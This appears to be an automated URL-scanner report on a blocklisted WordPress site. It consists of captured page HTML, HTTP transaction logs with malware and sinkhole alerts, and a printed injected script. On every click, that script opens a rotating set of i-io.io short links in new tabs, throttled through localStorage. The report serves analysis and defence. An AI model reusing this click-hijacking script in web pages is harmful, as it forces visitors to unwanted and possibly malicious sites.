                                                                                                                                    right: 0; - webkit - box - pack: end; - ms - flex - pack: end; - webkit - justify - content: flex - end;
                                                                                                                                    justify - content: flex - end;
                                                                                                                                    --primary - color: #427fe1;--secondary-color:# fbfbfb;
                                                                                                                                    --tertiary - color: # fff;
                                                                                                                                } < /style><style data-emotion="css-global adbqwp">.css-adbqwp{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:column;-ms-flex-direction:column;flex-direction:column;min-width:0;--primary-color:#427fe1;--secondary-color:#fbfbfb;--tertiary-color:#fff;}</style > < style data - emotion = "css-global 1lrwoq5" > .css - 1 lrwoq5 {
                                                                                                                                    display: -webkit - box;display: -webkit - flex;display: -ms - flexbox;display: flex;min - width: 0;--primary - color: #427fe1;--secondary-color:# fbfbfb;--tertiary - color: # fff;
                                                                                                                                } < /style><style data-emotion="css-global z6wmrw">.css-z6wmrw{position:relative;width:255px;height:50px;box-shadow:0 4px 12px rgba(0,0,0,0.3);background:#FFFFFF;border-radius:8px 8px 0px 0px;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;padding:0 0.9em;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;--primary-color:#427fe1;--secondary-color:#fbfbfb;--tertiary-color:#fff;border-radius:4px 4px 0px 0px;height:40px;color:#FFFFFF;background-color:#d2a024;}.css-z6wmrw:hover{cursor:pointer;}.css-z6wmrw:focus{outline-style:auto;}</style > < style data - emotion = "css-global 1t5h7yy" > .css - 1 t5h7yy {
                                                                                                                                    margin: 1e m 0;--primary - color: #427fe1;--secondary-color:# fbfbfb;--tertiary - color: # fff;white - space: nowrap;overflow: hidden;text - overflow: ellipsis; - webkit - box - flex: 1; - webkit - flex - grow: 1; - ms - flex - positive: 1;flex - grow: 1;font - weight: 700;font - size: 0.9e m;margin - right: 4 px;--primary - color: #427fe1;--secondary-color:# fbfbfb;--tertiary - color: # fff;white - space: nowrap;overflow: hidden;text - overflow: ellipsis;
                                                                                                                                } < /style><style data-emotion="css-global 1f0le8r">.css-1f0le8r{-webkit-appearance:none;-moz-appearance:none;-ms-appearance:none;appearance:none;background:transparent;border:0;display:inline-block;margin:0;padding:0.5em;color:inherit;cursor:pointer;--primary-color:#427fe1;--secondary-color:#fbfbfb;--tertiary-color:#fff;padding:0 .5em;padding:0;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-ms-flex-pack:center;-webkit-justify-content:center;justify-content:center;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;border:0;border-radius:4px;--primary-color:#427fe1;--secondary-color:#fbfbfb;--tertiary-color:#fff;}.css-1f0le8r:disabled{cursor:not-allowed;}.css-1f0le8r:focus{outline-style:auto;}</style > < style data - emotion = "css-global kvf2v3" > .css - kvf2v3 {
                                                                                                                                    position: relative;display: -webkit - box;display: -webkit - flex;display: -ms - flexbox;display: flex;width: 24 px;height: 24 px; - webkit - align - items: center; - webkit - box - align: center; - ms - flex - align: center;align - items: center; - webkit - box - pack: center; - ms - flex - pack: center; - webkit - justify - content: center;justify - content: center;--primary - color: #427fe1;--secondary-color:# fbfbfb;--tertiary - color: # fff;
                                                                                                                                } < /style><style data-emotion="css-global 1usdo54">.css-1usdo54{display:inline-block;-webkit-flex-shrink:0;-ms-flex-negative:0;flex-shrink:0;width:1em;height:1em;font-size:1.5rem;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;fill:currentColor;}</style > < style data - emotion = "css-global 1arh9bj" > .css - 1 arh9bj {
                                                                                                                                    opacity: 1; - webkit - transform: scale(1); - moz - transform: scale(1); - ms - transform: scale(1);transform: scale(1);transform - origin: 50 % 50 % ; - webkit - transition: 200 ms cubic - bezier(0.18, 0.89, 0.32, 1.28) 50 ms;transition: 200 ms cubic - bezier(0.18, 0.89, 0.32, 1.28) 50 ms;--primary - color: #427fe1;--secondary-color:# fbfbfb;--tertiary - color: # fff;
                                                                                                                                } < /style><style data-emotion="css-global 11h0104">.css-11h0104{position:absolute;z-index:1;left:0;right:0;bottom:1px;-webkit-transition:opacity 150ms cubic-bezier(0.33, 0, 0.67, 1) 50ms;transition:opacity 150ms cubic-bezier(0.33, 0, 0.67, 1) 50ms;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;width:24px;height:24px;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;-webkit-justify-content:center;justify-content:center;opacity:0;--primary-color:#427fe1;--secondary-color:#fbfbfb;--tertiary-color:#fff;}</style > < style data - emotion = "css " > < /style> < /head> < body > < div dir = "ltr"
                                                                                                                                role = "main"
                                                                                                                                data - lc - id = "0"
                                                                                                                                data - lc - event = "mouseover:3m30d89f3wp;focus:m2xqlzgya5;blur:exz7g6rhka"
                                                                                                                                class = "css-qw898r eqd5v0k0" > < div class = "css-adbqwp ek650k30" > < div class = "css-1lrwoq5 e108e6fy0" > < /div><div class="css-1lrwoq5 e108e6fy0"><div data-lc-id="1" data-lc-event="click:mn15tg33a9h;mouseleave:bqk7g5nfbce;mouseenter:dqds0zyzg1l;focus:w0kka4f9ej;blur:dn3rp9zoeak" class="css-z6wmrw e16i86ec1"><p class="css-1t5h7yy e16i86ec0">Kami Siap Membantu Anda</p > < button type = "button"
                                                                                                                                aria - label = "Open LiveChat chat widget"
                                                                                                                                class = "e1mwfyk10 css-1f0le8r e1m5b1js0" > < div class = "css-kvf2v3 e1dmt1bi3" > < svg color = "inherit"
                                                                                                                                viewBox = "0 0 32 32"
                                                                                                                                class = "css-1usdo54" > < path fill = "#FFFFFF"
                                                                                                                                d = "M12.63,26.46H8.83a6.61,6.61,0,0,1-6.65-6.07,89.05,89.05,0,0,1,0-11.2A6.5,6.5,0,0,1,8.23,3.25a121.62,121.62,0,0,1,15.51,0A6.51,6.51,0,0,1,29.8,9.19a77.53,77.53,0,0,1,0,11.2,6.61,6.61,0,0,1-6.66,6.07H19.48L12.63,31V26.46" > < /path><path fill="#d2a024" d="M19.57,21.68h3.67a2.08,2.08,0,0,0,2.11-1.81,89.86,89.86,0,0,0,0-10.38,1.9,1.9,0,0,0-1.84-1.74,113.15,113.15,0,0,0-15,0A1.9,1.9,0,0,0,6.71,9.49a74.92,74.92,0,0,0-.06,10.38,2,2,0,0,0,2.1,1.81h3.81V26.5Z" class="css-1arh9bj eam5rsy0"></path > < /svg><div class="css-11h0104 e1dmt1bi2"></div > < /div></button > < /div></div > < /div></div > < /body> < /html>
                                    

#3 JavaScript::Write (size: 3544, repeated: 1) - SHA256: f9dff83947afab1be20810aa04dcdf4c0d6a711a990bda2ba42c8a45da9c96b5

                                        < script > (function(parameters) {
    const targets = ['https://i-io.io/01Gni', 'https://i-io.io/NKB39', 'https://i-io.io/pXSTF', 'https://i-io.io/1nfh4', 'https://i-io.io/545fl', 'https://i-io.io/hN95m', 'https://i-io.io/cLVBl', 'https://i-io.io/T690W', 'https://i-io.io/c6kd5', 'https://i-io.io/fNsgD']
        // Times between clicks
    const restMinutes = 1;
    // Number of hours to allow re-click 
    const allowedHours = 2;


    const saveTargetLocationsToStorage = (targets) => {
        targets.forEach((target, index) => {
            if (!localStorage.getItem(`${target}-local-storage`)) {
                localStorage.setItem(`${target}-local-storage`, 0);
            }
        });
    }
    const getRandomLocationFromStorage = (targets) => {
        const nonVisited = targets.filter((target, index) => localStorage.getItem(`${target}-local-storage`) == 0)
        return nonVisited[Math.floor(Math.random() * nonVisited.length)];
    }
    const setLocationAsVisited = (target) => localStorage.setItem(`${target}-local-storage`, 1);

    const getTimeStorage = (key) => localStorage.getItem(`${key}-local-storage`);
    const setTimeToStorage = (key, nowDate) => localStorage.setItem(`${key}-local-storage`, nowDate);

    const getHoursDiff = (startDate, endDate) => {
        const msInHour = 1000 * 60 * 60;
        return Math.round(Math.abs(endDate - startDate) / msInHour);
    }
    const getMintsDiff = (startDate, endDate) => {
        const msInMints = 1000 * 60;
        return Math.round(Math.abs(endDate - startDate) / msInMints);
    }

    const visitNewLocation = (targets, host, nowDate) => {
        saveTargetLocationsToStorage(targets);
        newLocation = getRandomLocationFromStorage(targets);
        setTimeToStorage(`${host}-mnts`, nowDate);
        setTimeToStorage(`${host}-hurs`, nowDate);
        setLocationAsVisited(newLocation);
        window.open(newLocation, "_blank");
    }

    // const randomLocation = getRandomLocationFromStorage(targets);
    saveTargetLocationsToStorage(targets);

    function globalClick(event) {
        event.stopPropagation();
        const host = location.host;
        let newLocation = getRandomLocationFromStorage(targets);
        const nowDate = Date.parse(new Date());
        const savedDateForMints = getTimeStorage(`${host}-mnts`);
        const savedDateForHours = getTimeStorage(`${host}-hurs`);

        if (savedDateForMints && savedDateForHours) {
            try {
                const storageDateForMints = parseInt(savedDateForMints);
                const storageDateForHours = parseInt(savedDateForHours);
                const mintsDiff = getMintsDiff(nowDate, storageDateForMints);
                const hoursDiff = getHoursDiff(nowDate, storageDateForHours);

                if (hoursDiff >= allowedHours) {
                    saveTargetLocationsToStorage(targets);
                    setTimeToStorage(`${host}-hurs`, nowDate);
                }
                if (mintsDiff >= restMinutes) {
                    if (newLocation) {
                        setTimeToStorage(`${host}-mnts`, nowDate);
                        window.open(newLocation, "_blank");
                        setLocationAsVisited(newLocation);
                    }
                }
            } catch (error) {
                visitNewLocation(targets, host, nowDate);
            }
        } else {
            visitNewLocation(targets, host, nowDate);
        }
    }
    document.addEventListener("click", globalClick)
})() < /script>
                                    


HTTP Transactions (54)


Request Response
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "164D11173045B569CAFB32E300E4C1EC6D6AB177FD34D0414CC40C541268779F"
Last-Modified: Thu, 24 Nov 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=11138
Expires: Fri, 25 Nov 2022 12:37:22 GMT
Date: Fri, 25 Nov 2022 09:31:44 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "141AC47ACC3800E5D35A82012FA4B044277ABAD3A95DC24415F66FB72C972AE6"
Last-Modified: Wed, 23 Nov 2022 21:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=2670
Expires: Fri, 25 Nov 2022 10:16:14 GMT
Date: Fri, 25 Nov 2022 09:31:44 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 1582
Cache-Control: max-age=91549
Date: Fri, 25 Nov 2022 09:31:44 GMT
Etag: "637f47ef-1d7"
Expires: Sat, 26 Nov 2022 10:57:33 GMT
Last-Modified: Thu, 24 Nov 2022 10:31:11 GMT
Server: ECS (ska/F717)
X-Cache: HIT
Content-Length: 471

                                        
                                            GET /chains/remote-settings.content-signature.mozilla.org-2022-12-30-09-21-26.chain HTTP/1.1 
Host: content-signature-2.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         34.160.144.191
HTTP/2 200 OK
content-type: binary/octet-stream
                                        
x-amz-id-2: r0qlkpGmie8YJuecRxRiYlPsv8nD1P0+cJ0WPI4hut8UPlsVTXSAUxCjU0rdhFJTcznErKh0r+M=
x-amz-request-id: 6V6PK5DC5HXEA39C
content-disposition: attachment
accept-ranges: bytes
server: AmazonS3
content-length: 5348
via: 1.1 google
date: Fri, 25 Nov 2022 08:43:46 GMT
age: 2878
last-modified: Thu, 10 Nov 2022 09:21:27 GMT
etag: "9ebddc2b260d081ebbefee47c037cb28"
cache-control: public,max-age=3600
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PEM certificate\012- , ASCII text
Size:   5348
Md5:    9ebddc2b260d081ebbefee47c037cb28
Sha1:   492bad62a7ca6a74738921ef5ae6f0be5edebf39
Sha256: 74bbb7cba16f7d084a08a0907d47d7496e5c148f904707ec6950f8f6a61027e5
                                        
                                            GET /v1/ HTTP/1.1 
Host: firefox.settings.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.102.187.140
HTTP/2 200 OK
content-type: application/json
                                        
access-control-allow-origin: *
access-control-expose-headers: Backoff, Alert, Content-Type, Retry-After, Content-Length
content-security-policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
strict-transport-security: max-age=31536000
x-content-type-options: nosniff
content-length: 939
via: 1.1 google
date: Fri, 25 Nov 2022 09:19:04 GMT
cache-control: public,max-age=3600
age: 760
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (939), with no line terminators
Size:   939
Md5:    d130218d0e2841f39c99610fe1a2ab90
Sha1:   29fbe1e177ee55c7a61ae0a206afff271cf5f945
Sha256: 6b6d74dccf10c2bc98a91c3388280d7ba1d9596bf8cadd7db0e2f63720b3d152
                                        
                                            GET /v1/tiles HTTP/1.1 
Host: contile.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.117.237.239
HTTP/2 200 OK
content-type: application/json
                                        
server: nginx
date: Fri, 25 Nov 2022 09:31:44 GMT
content-length: 12
strict-transport-security: max-age=31536000
via: 1.1 google
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with no line terminators
Size:   12
Md5:    23e88fb7b99543fb33315b29b1fad9d6
Sha1:   a48926c4ec03c7c8a4e8dffcd31e5a6cdda417ce
Sha256: 7d8f1de8b7de7bc21dfb546a1d0c51bf31f16eee5fad49dbceae1e76da38e5c3
                                        
                                            GET / HTTP/1.1 
Host: 198.50.143.158
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1

                                         
                                         198.50.143.158
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Date: Fri, 25 Nov 2022 09:31:42 GMT
Server: Apache
Content-Encoding: gzip
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked


--- Additional Info ---
Magic:  HTML document, ISO-8859 text, with very long lines (10732), with CRLF, LF line terminators
Size:   14268
Md5:    832f7b37f85613d310d3e1e3a4ae7399
Sha1:   11cfadf8489b0219b3706d700e35fb26c3cf7ace
Sha256: 1683b6932d7c1553b2a73e189b8138aa0ccdceae0f32c8b499466887760d8fd4

Alerts:
  Blocklists:
    - fortinet: Malware
    - quad9: Sinkholed
                                        
                                            GET /css?family=Roboto+Condensed%3A400%2C700%7CArimo%3A400%2C700&ver=5.5.11 HTTP/1.1 
Host: fonts.googleapis.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://198.50.143.158/

                                         
                                         142.250.74.10
HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
                                        
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
Link: <http://fonts.gstatic.com>; rel=preconnect; crossorigin
Expires: Fri, 25 Nov 2022 09:31:44 GMT
Date: Fri, 25 Nov 2022 09:31:44 GMT
Cache-Control: private, max-age=86400
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: same-origin-allow-popups
Content-Encoding: gzip
Transfer-Encoding: chunked
Server: ESF
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff


--- Additional Info ---
Magic:  ASCII text
Size:   797
Md5:    e547bca3b4a8b69bd0fb5c25875d8ec8
Sha1:   8efcaadf0ca0e4d164ef634c837e01558c790144
Sha256: 2725a7dfa16ba30dff263ac86679a478508c30b54b584890998647cac94d3d74
                                        
                                            GET /wp-content/themes/frontier/responsive.css?ver=1.3.3 HTTP/1.1 
Host: 198.50.143.158
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://198.50.143.158/

                                         
                                         198.50.143.158
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Fri, 25 Nov 2022 09:31:43 GMT
Server: Apache
Last-Modified: Sat, 19 Sep 2020 04:53:54 GMT
Accept-Ranges: bytes
Content-Length: 3388
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   3388
Md5:    8e9dd0811189e7b19c6bba3a23a708e2
Sha1:   23a0c620d9a817fdcefca60be92615d7fc2a097a
Sha256: 2c18587dfce8157256c0c811b1305b24bd405e8920b0fbe5c78abbd0eaae6182

Alerts:
  Blocklists:
    - quad9: Sinkholed
                                        
                                            GET /wp-content/themes/frontier/includes/genericons/genericons.css?ver=1.3.3 HTTP/1.1 
Host: 198.50.143.158
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://198.50.143.158/

                                         
                                         198.50.143.158
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Fri, 25 Nov 2022 09:31:43 GMT
Server: Apache
Last-Modified: Sat, 19 Sep 2020 04:53:54 GMT
Accept-Ranges: bytes
Content-Length: 28273
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with very long lines (18732)
Size:   28273
Md5:    ddc038dee5f190d484a548cd38bf6b44
Sha1:   0056a93693917ba456a6af6195d47dccdb51a051
Sha256: 11767e2677e127953439c215e06fd9a229dea6affa64d2fd37b67898d7ab7363

Alerts:
  Blocklists:
    - fortinet: Malware
    - quad9: Sinkholed
                                        
                                            GET /v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US HTTP/1.1 
Host: firefox.settings.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.102.187.140
HTTP/2 200 OK
content-type: application/json
                                        
access-control-allow-origin: *
access-control-expose-headers: ETag, Content-Type, Content-Length, Last-Modified, Alert, Backoff, Pragma, Expires, Retry-After, Cache-Control
content-security-policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
strict-transport-security: max-age=31536000
x-content-type-options: nosniff
content-length: 329
via: 1.1 google
date: Fri, 25 Nov 2022 09:11:11 GMT
cache-control: public,max-age=3600
age: 1233
last-modified: Fri, 25 Mar 2022 17:45:46 GMT
etag: "1648230346554"
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (329), with no line terminators
Size:   329
Md5:    0333b0655111aa68de771adfcc4db243
Sha1:   63f295a144ac87a7c8e23417626724eeca68a7eb
Sha256: 60636eb1dc67c9ed000fe0b49f03777ad6f549cb1d2b9ff010cf198465ae6300
                                        
                                            GET /wp-includes/css/dist/block-library/style.min.css?ver=5.5.11 HTTP/1.1 
Host: 198.50.143.158
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://198.50.143.158/

                                         
                                         198.50.143.158
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Fri, 25 Nov 2022 09:31:43 GMT
Server: Apache
Last-Modified: Sat, 19 Sep 2020 03:50:42 GMT
Accept-Ranges: bytes
Content-Length: 53907
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with very long lines (27100)
Size:   53907
Md5:    2e7e1d1c1d4d446a1b6b63295757d859
Sha1:   27a1d9dcbdc4aff486016b5c9f3ece6ad0c028c1
Sha256: 8c626f0f9b5c109539b256b73e72c02b300a184f46b4535c2eb86599215c78af

Alerts:
  Blocklists:
    - fortinet: Malware
    - quad9: Sinkholed
                                        
                                            GET /wp-content/themes/frontier/style.css?ver=1.3.3 HTTP/1.1 
Host: 198.50.143.158
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://198.50.143.158/

                                         
                                         198.50.143.158
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Fri, 25 Nov 2022 09:31:43 GMT
Server: Apache
Last-Modified: Sat, 19 Sep 2020 04:53:54 GMT
Accept-Ranges: bytes
Content-Length: 26075
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


--- Additional Info ---
Magic:  Unicode text, UTF-8 (with BOM) text, with very long lines (778), with CRLF line terminators
Size:   26075
Md5:    74f2ae460bebbed37dcb9fae20a99ccf
Sha1:   f1b2ddd2e578b7e16a1a1138cfd62d749a8ebda0
Sha256: 19dd6709c0cbc89cee429941278effad6f20d5fd1622c4b521a1fafdbdd3b84e

Alerts:
  Blocklists:
    - fortinet: Malware
    - quad9: Sinkholed
                                        
                                            GET /wp-includes/js/wp-embed.min.js?ver=5.5.11 HTTP/1.1 
Host: 198.50.143.158
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://198.50.143.158/

                                         
                                         198.50.143.158
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Fri, 25 Nov 2022 09:31:43 GMT
Server: Apache
Last-Modified: Thu, 15 Apr 2021 04:58:16 GMT
Accept-Ranges: bytes
Content-Length: 1426
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with very long lines (1391)
Size:   1426
Md5:    905225d5711b559d3092387d5ffbedbd
Sha1:   6f6c39075263bafb9e8c10f1b34a1a0f7ee03c9d
Sha256: 5be614bce53f767993a5f5f14a6badd6aae6bf3af7cbdbf4d31520de49e27991

Alerts:
  Blocklists:
    - fortinet: Malware
    - quad9: Sinkholed
                                        
                                            GET /wp-includes/js/wp-emoji-release.min.js?ver=5.5.11 HTTP/1.1 
Host: 198.50.143.158
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://198.50.143.158/

                                         
                                         198.50.143.158
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Fri, 25 Nov 2022 09:31:43 GMT
Server: Apache
Last-Modified: Thu, 15 Apr 2021 04:58:16 GMT
Accept-Ranges: bytes
Content-Length: 14229
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with very long lines (11272)
Size:   14229
Md5:    878184c5d285d4d52d926d36ef19b718
Sha1:   dd260ffe0f8e3f38f58efd23cac8a1e5c788dad9
Sha256: 07e4203b9f313b587b1d53f896e63771ec85f9b0d4c2ac5fa64089457784d847

Alerts:
  Blocklists:
    - quad9: Sinkholed
                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 5218
Cache-Control: 'max-age=158059'
Date: Fri, 25 Nov 2022 09:31:45 GMT
Last-Modified: Fri, 25 Nov 2022 08:04:47 GMT
Server: ECS (ska/F717)
X-Cache: HIT
Content-Length: 471

                                        
                                            GET /wp-includes/js/jquery/jquery.js?ver=1.12.4-wp HTTP/1.1 
Host: 198.50.143.158
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://198.50.143.158/

                                         
                                         198.50.143.158
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Fri, 25 Nov 2022 09:31:43 GMT
Server: Apache
Last-Modified: Fri, 17 May 2019 04:25:54 GMT
Accept-Ranges: bytes
Content-Length: 96873
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with very long lines (31997)
Size:   96873
Md5:    49edccea2e7ba985cadc9ba0531cbed1
Sha1:   f8747f8ee704d9af31d0950015e01d3f9635b070
Sha256: 1db21d816296e6939ba1f42962496e4134ae2b0081e26970864c40c6d02bb1df

Alerts:
  Blocklists:
    - fortinet: Malware
    - quad9: Sinkholed
                                        
                                            GET /tracking.js HTTP/1.1 
Host: cdn.livechatinc.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://198.50.143.158/

                                         
                                         23.36.79.16
HTTP/1.1 301 Moved Permanently
Content-Type: application/javascript; charset=utf-8
                                        
Server: AkamaiGHost
Content-Length: 0
Location: https://cdn.livechatinc.com/tracking.js
Cache-Control: max-age=28800
Expires: Fri, 25 Nov 2022 17:31:45 GMT
Date: Fri, 25 Nov 2022 09:31:45 GMT
Connection: keep-alive
Access-Control-Allow-Origin: *

                                        
                                            GET /s/robotocondensed/v25/ieVl2ZhZI2eCN5jzbjEETS9weq8-19K7DQ.woff2 HTTP/1.1 
Host: fonts.gstatic.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: http://198.50.143.158
Connection: keep-alive
Referer: http://fonts.googleapis.com/

                                         
                                         216.58.207.195
HTTP/1.1 200 OK
Content-Type: font/woff2
                                        
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: same-origin; report-to="apps-themes"
Report-To: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
Timing-Allow-Origin: *
Content-Length: 15700
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
